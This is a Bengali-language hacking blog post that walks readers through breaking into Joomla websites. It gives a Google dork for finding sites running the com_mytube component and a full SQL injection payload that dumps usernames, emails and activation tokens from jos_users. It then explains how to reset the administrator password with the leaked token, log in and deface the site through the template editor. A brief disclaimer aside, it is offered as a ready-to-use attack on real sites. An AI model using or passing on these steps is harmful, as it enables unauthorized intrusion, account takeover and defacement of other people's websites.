জুমলা সাইট হ্যাকিং । কিভাবে জুমলা ওয়েবসাইট হ্যাক করবেন

জুমলা সাইট হ্যাকিং । কিভাবে জুমলা ওয়েবসাইট হ্যাক করবেন

 

আমি MrNHaCkEr চলে আসলাম আপনাদের মাঝে ।।
আমি এবার দেখাব কিভাবে জুমলা সাইট হ্যাক করবেন ।। ইমেজ সহঃ
কথা না বারিয়ে দ্রুত কাজ সুরু করে দিয় ।

বিঃদ্রঃ দয়া করে আমার লিখা কোন কিছু খারাপ কাজে ব্যবহার করবেন না ।। আপনার কোন কিছুর জন্য আমি দায়ি থাকব না -><-

---

Finding Exploit and Target

প্রথমে নিচের Google Dork টা দিয়ে গুগল এ সার্চ দিনঃ

inurl:”option=com_mytube”

গুগল আপনাকে অনেক সাইট আর সন্ধান দিবে । একটাকে লক্ষ বানিয়ে নিন ।
নিচের মত হবে সাইটটির এড্রেস ;

http://targetsite.com/index.php?option=com_mytube&Itemid=88…

এবার সাইট এর URL এর সাথে নিচের URL টি পরিবর্তন করুন –>

/index.php?option=com_mytube&Itemid=88&view=videos&type=member&user_id=62+AND+1=2+UNION+SELECT+0,1,2,3,4,5,6,7,8,9,10,11,concat%280x3a,username,0x3a,email,0x3a,activation%29,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users+where+id=62–

এই রকম হবে ঃ

http://targetsite.com/index.php?option=com_mytube&Itemid=88&view=videos&type=member&user_id=62+AND+1=2+UNION+SELECT+0,1,2,3,4,5,6,7,8,9,10,11,concat%280x3a,username,0x3a,email,0x3a,activation%29,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users+where+id=62–

যদি আপনার টার্গেট সাইট টি  vulnerable হয় তাহলে নিচের মত দেখতে পাবেন পেজ টি তে –>

উপরে ইমেজ এ username, email and activation code <———-
এই পেজ টি ওপেন রেখে অন্য একতা ট্যাব ওপেন করুন –>

Admin password reset

এবার সুধু সাইট টির এড্রেস টা নিয়ের নিচের মত URL এর শেষে নিচের URL টি পরিবর্তন করুনঃ —->

/index.php?option=com_user&view=reset

নিচের মতঃ ——>

http://www.targetsite.com/index.php?option=com_user&view=reset      <————-

This is standard Joomla query for password reset request

এখানে আমরা উপরের যেই ইমেইল টা পেয়েসি সেই টা দিব —–>
এবার Submit করুন ।
এর পর Activation কোড টা Reset হয়ে যাবে । < যেই টা আমরা প্রথম ধাপ টা করে পেয়েসি >
প্রথম ট্যাব এ ফিরে আসুন যেই টা প্রথম ওপেন করে রেখে দিয়েসেন ।;
এবার পেজ টা একবার Refresh করুন ।
নতুন Activation code টা  কপি করে Token এর ঘরে দিন , ইউজার নেম <এ প্রথম ট্যাব থেকে পাওয়া ইউজার নেম পাওয়া > নাম টা দিন ।
এই রকম activation code দেখলে তাহলে অন্য সাইট খুজুন ->  $1$14411

Admin Login

যদি সব কিছু ঠিক থাকে তাহলে নিচের মত Password এর পেজ আসবে নতুন Password দিন ।

তার পর নিচের URL টা সাইট টার সাথে লাগিয়ে দিন ।।

administrator/

এই রকম ঃ

http://www.targetsite.com/administrator/

এবার ইউজার নেম এবং পাস দিয়ে লগ ইন  করুন ।। ওয়াও !! গ্রেট ।
এবার Go to Extensions >> Template Manager >> Default Template Name >> Edit HTML
In Template HTML Editor insert your defaced code, click Apply, Save কাজ শেষ ।
বিদায় নিতে বাধ্য হলাম আরও কিছু লিখার ইচ্ছা ছিল পারলাম না ।।
সবার সুস্থ সুন্দর জীবন কামনা করি …। ।

Share on Google Plus

About joy bangla

This is a short description in the author block about the author. You edit it by entering text in the "Biographical Info" field in the user admin panel.